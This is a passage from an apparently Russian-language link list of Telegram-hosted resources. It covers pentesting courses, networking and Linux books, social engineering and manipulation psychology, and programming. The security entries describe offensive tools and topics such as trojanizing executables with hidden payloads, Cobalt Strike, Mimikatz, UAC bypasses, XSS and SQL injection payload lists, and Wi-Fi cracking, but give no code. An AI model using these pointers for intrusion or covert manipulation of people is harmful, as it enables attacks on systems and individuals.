Kubernetes. * [Full Ethical Hacking Course - Network Penetration Testing for Beginners (2019).](https://t.me/S_E_Book/208) - Learn network penetration testing / ethical hacking in this full tutorial course for beginners. This course teaches everything you need to know to get started with ethical hacking and penetration testing. You will learn the practical skills necessary to work in the field. Throughout the course, we will develop our own Active Directory lab in Windows, make it vulnerable, hack it, and patch it. We'll cover the red and blue sides. We'll also cover some of the boring stuff like report writing. ## Информационная безопасность Manual Дополнительный полезный материал: софт, ресурсы, подборки, мануалы, статьи и многое другое... * [Linux Command Library.](https://t.me/S_E_Book/583) - Самоучитель в котором собраны основные команды, используемые при работе с UNIX системами. * [BlackHat USA. 2019.](https://t.me/S_E_Book/194) - Интересное чтиво с BlackHat USA. * [Поисковик эксплойтов - sploitus.](https://t.me/S_E_Book/199) - Позволяет искать по содержимому и имени в публичных эксплойтах, подбирать софт по его описанию, смотреть и скачивать их в два клика. * [PENETRATION TESTING PRACTICE LAB.](https://t.me/S_E_Book/279) - Полезные инструменты для реального тестирования безопасности ИТ-инфраструктуры. * [Интерактивный курс по веб-уязвимостям.](https://t.me/S_E_Book/280) - Hacksplaining представляет каталогизированный и наглядный онлайн-туториал по основным веб-уязвимостям. По каждой уязвимости представлено подробное описание, насколько часто встречается, как сложно ее эксплуатировать и уровень ее критичности. К каждой уязвимости приложено подробное описание, вектор эксплуатации, уязвимый код и рекомендации по устранению и защите. В качестве примера в статье приведен разбор одного из заданий по взлому виртуального онлайн-банкинга с помощью эксплуатации sql-инъекции. * [Trojanizer.](https://t.me/S_E_Book/287) - Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла. К примеру: наш payload и легальное приложение одновременно. * [SQL Injection Payload List.](https://t.me/S_E_Book/457) * [Инструкция по изготовлению реалистичного USB девайса для HID атак.](https://t.me/S_E_Book/471) * [Cobalt Strike полный мануал на Русском.](https://t.me/S_E_Book/559) - это богатый фреймворк для проведения тестов на проникновение. Из коробки имеет генератор полезных нагрузок в один клик, а также различные методы доставки, что экономит немало времени. * [Подборка книг о кибербезопасности: как провести пентест и что противопоставить социальной инженерии.](https://t.me/S_E_Book/564) - Книги из списка вышли в 2018–2019 году. Их рекомендуют на Hacker News и Reddit. Под катом — рассказы о тонкостях работы хакеров, размышления президента Microsoft о перспективах и рисках в ИТ, а также советы по пентестированию от специалиста, работавшего с DARPA, NSA и DIA. * [Чем искать уязвимости веб-приложений: сравниваем восемь популярных сканеров.](https://t.me/S_E_Book/581) - Сканеры веб-приложений — довольно популярная сегодня категория софта. Есть платные сканеры, есть бесплатные. У каждого из них свой набор параметров и уязвимостей, возможных для обнаружения. Некоторые ограничиваются только теми, что публикуются в OWASP Top Ten (Open Web Application Security Project), некоторые идут в своем black-box тестировании гораздо дальше. В этом посте мы собрали восемь популярных сканеров, рассмотрели их подробнее и попробовали в деле. * [UACMe — сборник методов обхода UAC.](https://t.me/S_E_Book/651) * [Введение в реверсинг с нуля используя IDA PRO.](https://t.me/S_E_Book/811) - Идея этих серий учебных пособий является обновить наш оригинальный курс по реверсингу, но используя IDA PRO. Будем обучаться использовать ее с нуля и работать будем с последней версией Windows. * [Hash Crack.](https://t.me/S_E_Book/813) - Password Cracking Manual. * [Black Hat USA 2019.](https://t.me/S_E_Book/814) - Black Hat USA 2019 Keynote: Every Security Team is a Software Team Now by Dino Dai Zovi * [SSH Pentesting Guide.](https://t.me/S_E_Book/815) - Quickly introduce the SSH protocol and implementations. Expose some common configuration mistakes then showcase some attacks on the protocol & implementations. Present some SSH pentesting & blue team tools. Give a standard reference for security guidelines and finally talk about an article I previously wrote on the topic of network pivoting. * [pwncat.](https://t.me/S_E_Book/836) - Netcat на стероидах с возможностью обхода Firewall/IDS/IPS, сканированием портов и другими возможностями. * [17 способов проникновения во внутреннюю сеть компании.](https://t.me/S_E_Book/850) - Безопасность. Слово означающие защищённость человека или организации от чего-либо/кого-либо. В эпоху кибербезопасности мы всё чаще задумываемся не столько о том, как защитить себя физически, сколько о том, как защитить себя от угроз извне (киберугроз). * [gns3.](https://t.me/S_E_Book/853) - сетевой программный эмулятор, впервые выпущенный в 2008 году. Он позволяет комбинировать виртуальные и реальные устройства, используемые для моделирования сложных сетей. * [Имитация целевых атак как оценка безопасности. Киберучения в формате Red Teaming.](https://t.me/S_E_Book/854) - Когда дело доходит до кибербезопасности, то, как правило, ни одна организация не является на 100% защищенной. Даже в организациях с передовыми технологиями защиты могут быть проблемные моменты в ключевых элементах — таких как люди, бизнес-процессы, технологии и связанные с ними точки пересечения. * [Сеть компании и MitM.](https://t.me/S_E_Book/858) - Статья , посвященная MITM атакам, на типичные протоколы и каналы передачи, встречающиеся практически в любой компании. Рассмотрим представляющие куда больший интерес для злоумышленника уровни: с сетевого по прикладной. * [Database Hacking.](https://t.me/S_E_Book/859) - Проверяем на прочность Oracle RDBMS. Классическое противостояние MS SQL и Metasploit. Получаем шелл с помощью PostgreSQL. MySQL под прицелом. Ситуация в мире NoSQL. RCE и Firebird. * [Атаки на SIP.](https://t.me/S_E_Book/875) * [Пентест FTP сервера с помощью Kali Linux.](https://t.me/S_E_Book/881) * [Огромное количество шпаргалок которые помогут тебе при пентесте.](https://t.me/S_E_Book/884) * [XSS Payloads, getting past alert.](https://t.me/S_E_Book/889) * [PENTESTING CHEATSHEET.](https://t.me/S_E_Book/892) * [Большой пак материала который поможет тебе при пентесте.](https://t.me/S_E_Book/894) * [Постэксплуатация в Windows.](https://t.me/S_E_Book/896) - Инструменты, руководства, методы, команды и т.д. * [XSS Payload List - Cross Site Scripting.](https://t.me/S_E_Book/897) * [USING POWERSHELL FOR PENTESTING IN KALI LINUX.](https://t.me/S_E_Book/906) * [RATKing: новая кампания с троянами удаленного доступа.](https://t.me/S_E_Book/948) * [Атаки на трасты между доменами.](https://t.me/S_E_Book/960) * [getgophish.](https://t.me/S_E_Book/992) - Фреймворк с открытым исходным кодом для фишинга. * [THE COMPLETE HASHCAT TUTORIAL.](https://t.me/S_E_Book/1055) * [Инструменты для сканирования linux серверов на наличие вредоносных программ и руткитов.](https://t.me/S_E_Book/1062) * [Материал для изучения Mimikatz.](https://t.me/S_E_Book/1063) * [Mimikatz – Windows Tutorial for Beginner.](https://t.me/S_E_Book/1096) * [Базовый курс по веб-безопасности, от Стэнфордского университета.](https://t.me/S_E_Book/1064) * [Бесплатный курс по взлому от HackerOne.](https://t.me/S_E_Book/1100) * [Новое применение Captive Portal для проведения MiTM атак.](https://t.me/S_E_Book/1109) * [Взлом банкоматов. Конференция DEF CON.](https://t.me/S_E_Book/1072) * [Penetration Testing Using Armitage.](https://t.me/S_E_Book/1073) * [Основы Linux - полезные сетевые команды.](https://t.me/S_E_Book/1075) * [MiTM Attack with Ettercap.](https://t.me/S_E_Book/1089) * [Атаки на домен.](https://t.me/S_E_Book/1095) - При проведении тестирований на проникновение мы довольно часто выявляем ошибки в конфигурации домена. Хотя многим это не кажется критичным, в реальности же такие неточности могут стать причиной компрометации всего домена. * [Tradecraft.](https://t.me/S_E_Book/1117) - это курс действий red team. Ты научишься проводить целевую атаку как внешний субъект с Cobalt Strike. В этом сегменте представлены Metasploit Framework, Cobalt Strike, и вы узнаете, как организованы оба этих инструмента. * [«Взлом Wi-Fi сетей с Kali Linux и BlackArch» (на русском языке).](https://t.me/S_E_Book/1167) - Подготовка рабочего окружения: железо и софт; Первые шаги по взлому Wi-Fi сетей, обход простых защит; Захват WPA / WPA2 рукопожатий; Взлом паролей из WPA / WPA2 рукопожатий; Взлом WPS пина; Автоматизированные атаки на Wi-Fi сети; Онлайн перебор ключей Wi-Fi; Социальная инженерия при взломе Wi-Fi сетей; Атаки с использованием Wi-Fi сетей; Атака на Wi-Fi точки доступа из глобальной и локальной сетей; Атаки вида «отказ в обслуживании» (DoS Wi-Fi); Атаки «Без клиентов» и «Без Точек Доступа»; Мониторинг беспроводных сетей и выявление атак на Wi-Fi; Перехват данных в сетях Wi-Fi после проникновения; Выявление перехвата данных в сетях Wi-Fi; Взлом Wi-Fi сетей из Windows. * [Анализ трафика GSM сетей в Wireshark.](https://t.me/S_E_Book/1168) - Запускаем GSM-сеть у себя дома, Анализ трафика GSM сетей в Wireshark, Добавляем GPRS в домашнюю GSM сеть, Практические примеры атак внутри GSM сети. * [Group Policy Hijacking В ДОМЕННЫХ СЕТЯХ | ОПИСАНИЕ | ДЕМОНСТРАЦИЯ | MITM.](https://t.me/S_E_Book/1173) - В видео продемонстрирована малоизвестная техника, которая позволяет получить права SYSTEM на клиентах доменной сети даже в 2020 году. * [Продвинутый взлом паролей с *Hashcat на русском языке.](https://t.me/S_E_Book/1180) - Обзор программ *Hashcat; Справочная информация по программам *Hashcat; Режимы атак *Hashcat; Взлом отдельных хешей с *Hashcat; Установка и решение проблем с *Hashcat; Подсказки и приёмы использования Hashcat. * [Тестирование на проникновение веб-сайтов.](https://t.me/S_E_Book/1187) - Подборка уязвимый сред для практики по взлому сайтов; Сбор информации;Сканеры уязвимостей веб-приложений; Уязвимости веб-сайтов. Подтверждение и эксплуатация уязвимостей; Брут-форс учётных записей; Закрепление доступа; Анонимность при исследовании веб-приложений; Фейерволы веб-приложений: выявление и техники обхода (Web Application Firewall (WAF)); Дополнительный материал для пентестеров веб-приложений и веб-мастеров. * [16 основных уязвимостей Active Directory.](https://t.me/S_E_Book/1192) - This list consist of 16 issues that are most commonly found during internal infrastructure penetration tests and vulnerability assessments. It’s nothing terribly sophisticated or new, simply a list of typical problems. ## Сетевые технологии RU Администрирование, Книги и курсы на Русском языке. * [Windows PowerShell 2.0. Справочник администратора.](https://t.me/S_E_Book/665) - Этот краткий справочник содержит ответы на любые вопросы, связанные с администрированием Windows из командной строки. В этой книге Вы найдёте множество рецептов, которые позволят задействовать богатый арсенал средств PowerShell 2.0 для решения повседневных задач, включая управление компьютерами и сетями. * [Н. В. Максимов, И. И. Попов. Компьютерные сети.](https://t.me/S_E_Book/78) - Работа компьютерных сетей не обязана интересовать только системных администраторов, на самом деле знать, как их настраивать, методы передачи данных, модель OSI, архитектуру и много другое, должен каждый программист, независимо от своего опыта. Эта книга понятным языком расскажет обо всех аспектах и явлениях, связанных с компьютерными сетями. В книге рассматриваются следующие темы: ✔️ основные понятия, элементы и структуры; ✔️ каналы телекоммуникации; ✔️ технологии "терминал - хост"; ✔️ технологии локальных сетей; ✔️ протоколы транспортного уровня; ✔️ информационные системы. * [Дуглас Э. Камер.Сети TCP/IP. Принципы, протоколы и структура.](https://t.me/S_E_Book/128) - Эта книга задумывалась как учебник для вузов и как справочное руководство для специалистов, поэтому она написана на высоком профессиональном уровне. Специалисты могут почерпнуть в ней подробное описание технологии сетей TCP/IP и структуры Internet. Автор книги не ставил перед собой цель заменить описание существующих стандартов протоколов. Тем не менее книгу можно рассматривать как великолепную отправную точку в изучении технологии глобальных сетей, поскольку в ней изложены основы и сделан акцент на принципах их работы. Кроме того, книга дает читателю ориентиры для поиска дополнительной информации, которые было бы трудно получить на основе изучения отдельных стандартов протоколов. * [Курсы Cisco. Ч.1.](https://t.me/S_E_Book/138) - Сертификация Cisco, Switch & Router, Точки доступа, Firewalls, скорость и объем, Кабели, методы коммуникаций, Маска подсети, Default gateway & DNS Server, NAT, Public & Private addresses. * [Курсы Cisco. Ч.2.](https://t.me/S_E_Book/138) - виды IP коммуникаций, протоколы TCP, UDP, ICMP, Инструменты инженера, Distribution switches, Модели OSI и TCP, введение в IOS, подключение по консоли, Режимы IOS, Базовые команды, Файловая система IOS. * [Тренинг Cisco 200-125 CCNA v3.0. Сертифицированный сетевой специалист Cisco (ССNA).](https://t.me/S_E_Book/179) - Для всех новичков и тех, кто хочет прокачать\улучшить свои скиллы ниже представлен пак совсем свежих апдейтенных самой Академией Cisco различных статей и видео-уроков по сетевым технологиям (Тренинг Cisco 200-125 CCNA v3.0). * [Компьютерные уроки | Уроки Cisco | ICND1.](https://t.me/S_E_Book/376) - Сертификация Cisco, Switch & Router, Точки доступа, Firewalls, скорость и объем, Кабели, методы коммуникаций, Маска подсети, Default gateway & DNS Server, NAT, Public & Private addresses, виды IP коммуникаций, протоколы TCP, UDP, ICMP, Инструменты инженера, Distribution switches, Модели OSI и TCP, введение в IOS, подключение по консоли, Режимы IOS, Базовые команды, Файловая система IOS, Базовая конфигурация, SSH, Interface Syntax, Switching fundamentals. * [У. Одом "Официальное руководство Cisco по подготовке к сертификационным экзаменам CCNA ICND2 200-101. Маршрутизация и коммутация".](https://t.me/S_E_Book/402) - Настоящее академическое издание - исчерпывающий справочник и учебное пособие, знакомящие с фундаментальными концепциями настройки сетей, поиска и устранения неисправностей. Книги этой серии являются официальным первоисточником для подготовки к экзамену, предоставляют теоретические и практические материалы, которые помогут кандидатам на сертификат Cisco Career Certification выявить свои слабые стороны. * [Курс молодого бойца.](https://t.me/S_E_Book/604) - Практический курс для новичков в мире сетевых технологий. Посмотрев данный материал вы научитесь пользоваться программным симулятором Cisco Packet Tracer и познакомитесь с основными понятиями, технологиями и приемами, которые используются при построении корпоративных сетей. Курс исключительно практический и содержит минимум теории, что делает его не таким утомительным. * [Компьютерные сети. Принципы, технологии, протоколы. 2020.](https://t.me/S_E_Book/678) - Издание предназначено для студентов, аспирантов и технических специалистов, которые хотели бы получить базовые знания о принципах построения компьютерных сетей, понять особенности традиционных и перспективных технологий локальных и глобальных сетей, изучить способы создания крупных составных сетей и управления такими сетями. * [Волоконно-оптические сети и системы связи.](https://t.me/S_E_Book/680) - Рассмотрены основные протоколы, используемые в оптических сетях, вопросы тестирования систем, методы передачи информационных потоков. Большое внимание уделено аппаратуре цифровой иерархии, вопросам уплотнения, оптическим сетям доступа. Рассмотрены новые пассивные и активные элементы сетей, отечественные и зарубежные кабели. Освещены принципы работы оптических рамановских (ВКР) усилителей, электроабсорбционного модулятора света, широко используемого в современных высокоскоростных системах передачи. * [Руководство и шпаргалка по Wireshark.](https://t.me/S_E_Book/699) - WireShark — анализатор пакетов, программа номер один для сетевого анализа, траблшутинга, разработки программных и коммуникационных протоколов, а также всем, что связано с обучением нетворкингу. * [Всё, что вы хотели знать о МАС адресе.](https://t.me/S_E_Book/1028) - Всем известно, что это шесть байт, обычно отображаемых в шестнадцатеричном формате, присвоены сетевой карте на заводе, и на первый взгляд случайны. Некоторые знают, что первые три байта адреса – это идентификатор производителя, а остальные три байта им назначаются. Известно также, что можно поставить себе произвольный адрес. Многие слышали и про "рандомные адреса" в Wi-Fi. * [Доходчивый разбор протоколов DHCP и DNS на Debian, RADIUS Server на Debian и RADIUS Client на Cisco.](https://t.me/S_E_Book/345) * [Современные операционные системы.](https://t.me/S_E_Book/152) - Новое издание всемирного бестселлера, необходимое для понимания функционирования современных операционных систем. Появился объемный раздел, посвященный операционной системе Android. Был обновлен материал, касающийся Unix и Linux, а также RAID-систем. Гораздо больше внимания уделено мультиядерным и многоядерным системам, важность которых в последние несколько лет постоянно возрастает. Появилась совершенно новая глава о виртуализации и облачных вычислениях. Добавился большой объем нового материала об использовании ошибок кода, о вредоносных программах и соответствующих мерах защиты. В книге в ясной и увлекательной форме приводится множество важных подробностей, которых нет ни в одном другом издании. * [Практическое руководство по использованию Wireshark и tcpdump для решения реальных проблем в локальных сетях.](test) - проведение текущего анализа сетевого трафика в реальном времени и его активный перехват, составление специальных фильтров для перехвата и отображения пакетов анализ пакетов для выявления и разрешения типичных проблем, возникающих в сети, включая потерю связи, медленную работу сети и решение вопросов, связанных со службой DNS, исследование современных наборов эксплойтов (средств эксплуатации уязвимостей) и вредоносных программ на уровне пакетов извлечение файлов, пересылаемых по сети, из перехваченных пакетов построение графиков из перехваченного сетевого трафика для наглядного представления потоков данных, проходящих по сети, использование дополнительных средств Wireshark, позволяющих разобраться в непонятных образцах перехвата сетевого трафика. * [Дэвид М. Харрис Сара Л. Харрис. Цифровая схемотехника и архитектура компьютера. Второе издание.](https://t.me/S_E_Book/220) - Бесплатный учебник электроники, архитектуры компьютера и низкоуровневого программирования на русском языке. * [Таненбаум Эндрю, Уэзеролл Дэвид. Компьютерные сети.](https://t.me/S_E_Book/246) - В книге последовательно изложены основные концепции, определяющие современное состояние и тенденции развития компьютерных сетей. Авторы подробнейшим образом объясняют устройство и принципы работы аппаратного и программного обеспечения, рассматривают все аспекты и уровни организации сетей - от физического до уровня прикладных программ. Изложение теоретических принципов дополняется яркими, показательными примерами функционирования Интернета и компьютерных сетей различного типа. Пятое издание полностью переработано с учетом изменений, происшедших в сфере сетевых технологий за последние годы и, в частности, освещает такие аспекты, как беспроводные сети стандарта 802.12 и 802.16, сети 3G, технология RFID, инфраструктура доставки контента CDN, пиринговые сети, потоковое вещание, интернет-телефония и многое другое. * [Д. Куроуз, Т. Росс "Компьютерные сети. Настольная книга системного администратора".](https://t.me/S_E_Book/403) - Всемирно известная книга, пережившая шесть переизданий и на протяжении 15 лет возглавляющая рейтинги продаж по всему миру. Несмотря на свой долгий путь, она ничуть не утратила актуальности и продолжает оставаться незаменимым источником знаний для людей, чья работа связана с организацией компьютерных сетей. * [Полный курс по этичному хакингу с Nmap. Нэйтан Хаус.](https://t.me/S_E_Book/451) - Учимся использовать Nmap в целях этичного хакинга, системного администрирования и сетевой безопасности; Учимся обнаруживать активные и уязвимые хосты в сети; Изучаем скриптовый движок Nmap (NSE), используемый для продвинутого обнаружения и взлома. Рассмотрим различные скрипты, включая используемые для брутфорса паролей электронной почты и баз данных, для межсайтового скриптинга (XSS) и SQL-инъекций;Учимся определять правила файрвола, избегая обнаружения; Учимся избегать обнаружения файрволами и системами обнаружения вторжений (IDS); Изучаем выходные данные Nmap (конвертация, слияние, сравнение); Рассматриваем обе версии Nmap: консольную и GUI-версию (Zenmap); Изучаем Zenmap (Nmap GUI); Поймем, как Nmap используется в комбинации с C&C-инфраструктурой злоумышленников. ## Сетевые технологии Eng Администрирование, Книги и курсы на Английском языке. * [Mastering Wireshark 2.](https://t.me/S_E_Book/710) - Develop skills for network analysis and address a wide range of information security threats. * [Packet Analysis with Wireshark.](https://t.me/S_E_Book/808) - The book starts by introducing you to various packet analyzers and helping you find out which one best suits your needs. You will learn how to use the command line and the Wireshark GUI to capture packets by employing filters. Moving on, you will acquire knowledge about TCP/IP communication and its use cases. You will then get an understanding of the SSL/TLS flow with Wireshark and tackle the associated problems with it. Next, you will perform analysis on application-related protocols. We follow this with some best practices to analyze wireless traffic. By the end of the book, you will have developed the skills needed for you to identify packets for malicious attacks, intrusions, and other malware attacks. * [Network Analysis Using Wireshark 2 Cookbook.](https://t.me/S_E_Book/832) - В книге подробно описаны некоторые темы, касательно сетевой безопасности, беспроводной локальной сети и способы использования Wireshark для мониторинга облачных и виртуальных систем. * [Иллюстрированное соединение через TLS.](https://t.me/S_E_Book/876) - Каждый байт соединения TLS объяснен и воспроизведен. * [Instant Netcat Starter.](https://t.me/S_E_Book/886) - This book explores the classic Netcat utility, and breaks down the common ways in which it can be utilized in the field. Beginning with compilation and installation, this book quickly has you utilizing the core features of the utility to perform file transfers regardless of commonly blocked firewall ports, perform real-world interrogation of services and listening ports to discover the true intention of an application or service, and tunnelling remotely into systems to produce remote command shells. * [Nmap Essentials.](https://t.me/S_E_Book/923) - This book is for beginners who wish to start using Nmap, who have experience as a system administrator or of network engineering, and who wish to get started with Nmap. * [tcpdump — чтение tcp-флагов.](https://t.me/S_E_Book/1031) * [Mastering Windows Server 2019, Second Edition.](https://t.me/S_E_Book/714) - Mastering Windows Server 2019 – Second Edition covers all of the essential information needed to implement and utilize this latest-and-greatest platform as the core of your data center computing needs. You will begin by installing and managing Windows Server 2019, and by clearing up common points of confusion surrounding the versions and licensing of this new product. Centralized management, monitoring, and configuration of servers is key to an efficient IT department, and you will discover multiple methods for quickly managing all of your servers from a single pane of glass. To this end, you will spend time inside Server Manager, PowerShell, and even the new Windows Admin Center, formerly known as Project Honolulu. Even though this book is focused on Windows Server 2019 LTSC, we will still discuss containers and Nano Server, which are more commonly related to the SAC channel of the server platform, for a well-rounded exposition of all aspects of using Windows Server in your environment. We also discuss the various remote access technologies available in this operating system, as well as guidelines for virtualizing your data center with Hyper-V. By the end of this book, you will have all the ammunition required to start planning for, implementing, and managing Windows. * [Linux Administration Cookbook.](test) - Установка и управление сервером Linux как локально, так и в облаке, Понять, как выполнять администрирование во всех дистрибутивах Linux, Прорабатывайте такие концепции, как IaaS и PaaS, контейнеры и автоматизация, Ознакомьтесь с рекомендациями по безопасности и настройке, Устраните неполадки в вашей системе, если что-то пойдет не так, Обнаружение и устранение аппаратных проблем, таких как неисправная память и неисправные диски; * [Understanding Linux Network Internals.](https://t.me/S_E_Book/882) - If you've ever wondered how Linux carries out the complicated tasks assigned to it by the IP protocols -- or if you just want to learn about modern networking through real-life examples -- Understanding Linux Network Internals is for you. ## Social Engineering RU Социальная инженерия, книги на Русском языке. * [Кевин Митник.Призрак в Сети.](https://t.me/S_E_Book/27) - "Призрак в Сети" - захватывающая невыдуманная история интриг, саспенса и невероятных побегов. Это портрет провидца, обладающего такой изобретательностью, хваткой и настойчивостью, что властям пришлось полностью переосмыслить стратегию погони за ним. Отголоски этой эпической схватки чувствуются в сфере компьютерной безопасности и сегодня. * [Энтони Роббинс.Книга о власти над собой.](https://t.me/S_E_Book/48) - Книга предлагает глубокую и умную программу достижения успеха, позволяющую самостоятельно избавиться от страхов и предрассудков, кардинально улучшить отношения с окружающими людьми, зарядить свой организм завидным здоровьем и неукротимой энергией. * [Социальная инженерия и социальные хакеры. Кузнецов Максим Валерьевич.](https://t.me/S_E_Book/116) - В книге описан арсенал основных средств современного социального хакера (трансактный анализ, нейролингвистическое программирование), рассмотрены и подробно разобраны многочисленные примеры социального программирования (науки, изучающей программирование поведения человека) и способы защиты от социального хакерства. * [Вильям Л. Саймон, Кевин Митник. Искусство вторжения.](https://t.me/S_E_Book/151) - Истории, рассказанные в этой книге, демонстрируют, как небезопасны все компьютерные системы, и как мы уязвимы перед подобными атаками. Урок этих историй заключается в том, что хакеры находят новые и новые уязвимости каждый день. Читая эту книгу, думайте не о том, как изучить конкретные уязвимости тех или иных устройств, а о том, как изменить ваш подход к проблеме безопасности и приобрести новый опыт. * [Наварро Джо , Карлинс Марвин. Я вижу, о чем вы думаете. Как агенты ФБР читают людей.](https://t.me/S_E_Book/222) - Джо Наварро, бывший агент контрразведки ФБР, которого коллеги называют живым детектором лжи, научит вас моментально "сканировать" собеседника, расшифровывать едва заметные сигналы в его поведении, распознавать завуалированные эмоции и сразу же подмечать малейшие подвохи и признаки лжи. Вы узнаете, как язык вашего тела может повлиять на мнение о вас шефа, коллег по работе, родных, друзей и просто посторонних людей, и получите в свое распоряжение эффективный способ управления реальностью. Для широкого круга читателей. * [Кристофер Хэднеги. Искусство обмана.](https://t.me/S_E_Book/416) - Технологии, при помощи которых злоумышленники пытаются получить доступ к вашим паролям или данным, основаны на социальной инженерии – науке об изощренном и агрессивном манипулировании поведением людей. Она использует целый арсенал инструментов: давление на жалость, умение запудрить мозги или вывести из себя, проявить несвойственную жадность и поставить в неловкое положение, вызвать чувство вины или стыда и многое другое. * [Кевин Митник. Искусство быть невидимым.](https://t.me/S_E_Book/453) - Думаете, ваши данные в Интернете хорошо защищены? Так глубоко вы никогда не заблуждались! Кевин Митник – самый разыскиваемый хакер планеты в прошлом, а ныне один из ведущих специалистов по кибербезопасности – знает, насколько опасна неосведомленность в вопросах защиты данных в Сети. * [Видео. Социальная инженерия на практике.](https://t.me/S_E_Book/515) - Будут затронуты практические методы социальной инженерии и описаны реальные проекты компании по использованию СИ. Участники дискуссии поговорят о целях СИ как инструменте ИБ-специалиста: проверке возможности получения нарушителем доступа к системе или помещениям, проверке осведомленности сотрудников в вопросах ИБ, проверке работы служб внутренней и информационной безопасности, конкурентной разведке. ## Social Engineering Eng Социальная инженерия, книги на Английском языке. * [Social Engineering: The Science of Human Hacking.](https://t.me/S_E_Book/801) - Networks and systems can be hacked, but they can also be protected; when the “system” in question is a human being, there is no software to fall back on, no hardware upgrade, no code that can lock information down indefinitely. Human nature and emotion is the secret weapon of the malicious social engineering, and this book shows you how to recognize, predict, and prevent this type of manipulation by taking you inside the social engineer’s bag of tricks. * [Learn Social Engineering.](https://t.me/S_E_Book/867) - В книге разобраны типы атак с использованием социальной инженерии. От психологии до инструментов которые применяются при атаках с помощью СИ. ## Психология НЛП Профайлинг * [Пол Экман: Психология эмоций.](https://t.me/S_E_Book/3) - Что играет решающую роль в управлении поведением? Что читается по лицам и определяет качество нашей жизни? Что лежит в основе эффективного общения? Что мы испытываем с самого раннего детства? На все эти вопросы ответ один - эмоции. Эмоции явные, скрытые, контролируемые. Распознавать, оценивать, корректировать их на ранних стадиях у себя и у других научит новая книга Пола Экмана, книга-справочник, книга tour de force. * [Антонян, Эминов: Портреты преступников. Криминолого-психологический анализ.](https://t.me/S_E_Book/25) - В работе на основе современных подходов проводится криминолого-психологический анализ отдельных категорий людей, совершающих преступления. Раскрываются особенности совершения конкретных видов преступлений, дается классификация и типология преступников с учетом их индивидуальности и социальных условий жизнедеятельности. Для преподавателей, аспирантов, студентов юридических вузов, юристов-практиков, социологов и психологов, изучающих проблемы преступности и борьбы с ней, а также для широкого круга читателей. * [Эдвард Бернейс: Пропаганда.](https://t.me/S_E_Book/31) - Ни одна книга по PR не имеет такого значения как книга Бернейса «Пропаганда». В ней не только со всей откровенностью рассказано о методах пропаганды и в политике и бизнесе. В ней приведено большое количество практических примеров итеоретических обоснований. * [Юрий Чуфаровский: Психология оперативно-розыскной и следственной деятельности. Учебное пособие.](https://t.me/S_E_Book/41) - В книге доктора юридических наук, кандидата психологических наук Ю. В. Чуфаровского впервые в объединенном виде дана развернутая психологическая характеристика преступной деятельности и личности преступника, а также психология оперативно-розыскной и следственной деятельности. Подробно раскрыты психологические основы применения этих знаний в повседневной деятельности сотрудников правоохранительных органов. * [Кэррол Изард: Психология эмоций.](https://t.me/S_E_Book/99) - Имя Кэррола Э. Изарда, одного из создателей теории дифференциальных эмоций, известно каждому психологу. "Психология эмоций" (1991) является расширенной и переработанной версией его книги "Эмоции человека" (1978), которая стала у нас в стране одним из базовых пособий по курсу психологии личности. В "Психологии эмоций" Изард анализирует и обобщает огромное количество новых экспериментальных данных и теоретических концепций, вошедших в научный обиход в последние десятилетия, на протяжении которых наука об эмоциях стремительно эволюционировала. Рекомендуется изучающим психологию личности, социальную, когнитивную, клиническую психологию. * [Шейнов П.В.Скрытое управление человеком.](https://t.me/S_E_Book/121) - Эта книга не имеет аналогов в отечественной и зарубежной литературе. В ней исследованы предпосылки и технология скрытого управления и манипулирования. Даны многочисленные примеры применения этих приемов в отношениях между руководителями и подчиненными, деловыми партнерами, мужчинами и женщинами, родителями и детьми, учителями и учениками и т.д * [Шейнов В.П. Скрытое управление человеком.](https://t.me/S_E_Book/133) - Книга посвящена приемам воздействия на людей. В ней исследованы предпосылки и изучена технология скрытого управления и манипулирования. Даны многочисленные примеры применения этой технологии в отношениях между руководителями и подчиненными, женщинами и мужчинами, детьми и родителями, учителями и учениками и т. д. Книга помогает освоить данный способ управления людьми и учит защищаться от манипуляторов. Адресуется тем, кто желает добиться многого, опираясь на силу своего интеллекта. * [Безопасное общение, или Как стать неуязвимым.](https://t.me/S_E_Book/170) - Что нужно, чтобы стать неуязвимым? Возможно ли сохранять спокойствие в любой конфликтной ситуации, не превращаясь ни в молчаливого наблюдателя, ни в яростного борца за справедливость, ни в саркастического насмешника? Эта книга научит вас эффективной технике безопасного общения. С ее помощью вы сможете противостоять и легкому стрессу, и тяжелому прессингу * [Пол Экман. Узнай лжеца по выражению лица.](https://t.me/S_E_Book/239) - Вы заметите, если кто-то притворяется удивленным? А если кто-то испуган, но хочет выглядеть рассерженным, вам под силу это разглядеть? Насыщенная огромным количеством тщательно отобранных фотографий и специальных упражнений, эта книга позволит вам безошибочно распознавать ложь, моментально читая по лицам эмоции: как подлинные, так и "наигранные". Радость, удивление, страх, гнев, печаль, отвращение - ничто не ускользнет от вашего внимательного взгляда. * [РАЗБОР НАСТОЯЩЕГО ДЕТЕКТИВА: Как СКРЫТО вытягивать информацию.](https://t.me/S_E_Book/1151) - Как Раст Коул из сериала "Настоящей детектив" скрыто получает информацию от людей? Как он использует их слабости? Как он добивается признаний? Весь секрет в том, что будучи детективом он ведет себя не как ДЕТЕКТИВ, но что это значит? Смотрите в разборе сериала "Настоящий детектив" ## Программирование RU Книги по программированию на Русском языке. * [Ассемблер на примерах. Базовый курс.](https://t.me/S_E_Book/256) - Эта книга представляет собой великолепное практическое руководство по основам программирования на языке ассемблера. Изложение сопровождается большим количеством подробно откомментированных примеров, что способствует наилучшему пониманию и усвоению материала. Книга написана доступным языком. Лучший выбор для начинающих. * [Курс. Python. Полное руководство (2019)](https://t.me/S_E_Book/305) - Впервые в одном курсе связка Python и Tkinter GUI, Идеален для начинающих, низкий порог входа, Универсальный мощный язык под любые платформы, Получите много практики и 4 работы в портфолиоБыстрый старт и пошаговый план действий для новичков, Модули и библиотеки под большинство задачРеальная востребованность на рынке даже для новичков. * [Как устроен Python. Гид для разработчиков, программистов и интересующихся | Харрисон М.](https://t.me/S_E_Book/424) - Python - самый популярный язык программирования. Вакансии для Python-разработчиков входят в список самых высокооплачиваемых, а благодаря бурному развитию обработки данных, знание Python становится одним из самых востребованных навыков в среде аналитиков. * [Курс - Полное руководство по Python 3: от новичка до специалиста (2019).](https://t.me/S_E_Book/425) - Чему вы научитесь: Писать простые программы на Python 3. Как писать простые игры типа крестиков-ноликов. Логика с условиями и циклами. Объектно-ориентированное программирование на Python. Использование Jupyter Notebook. Использование коллекций в Python: списки, словари и так далее. Декораторы. Неизменяемые объекты. Лучшие практики по написанию "чистого" кода на Python. Введение в SQL и PostgreSQL. * [Python. Экспресс-курс | 